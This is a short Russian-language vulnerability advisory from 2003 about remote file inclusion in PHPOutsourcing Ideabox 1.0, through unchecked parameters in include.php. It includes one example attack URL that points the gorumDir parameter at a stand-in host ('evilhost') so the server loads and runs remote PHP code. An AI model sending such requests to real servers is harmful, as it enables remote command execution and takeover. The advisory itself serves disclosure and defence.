Security Lab

Выполнение произвольного PHP кода в PHPOutsourcing Ideabox

Дата публикации:05.05.2003
Всего просмотров:1876
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Несколько уязвимостей включения файла обнаружены в PHPOutsourcing's Ideabox. Удаленный пользователь может выполнить произвольные команды на целевом сервере.

F0KP сообщил, что сценарий include.php не проверяет данные, переданные пользователем. Удаленный пользователь может представить специально обработанный URL, который заставит целевой сервер включить произвольный PHP файл, расположенный на удаленном сервере. Выполняемый PHP код может содержать команды операционной системы. Пример:

http://[target]/ideabox/include.php?gorumDir=http://evilhost
Также уязвима переменная 'ideaDir'.

Уязвимость обнаружена в PHPOutsourcing Ideabox 1.0

Ссылки: IdeaBox: Remote Command Execution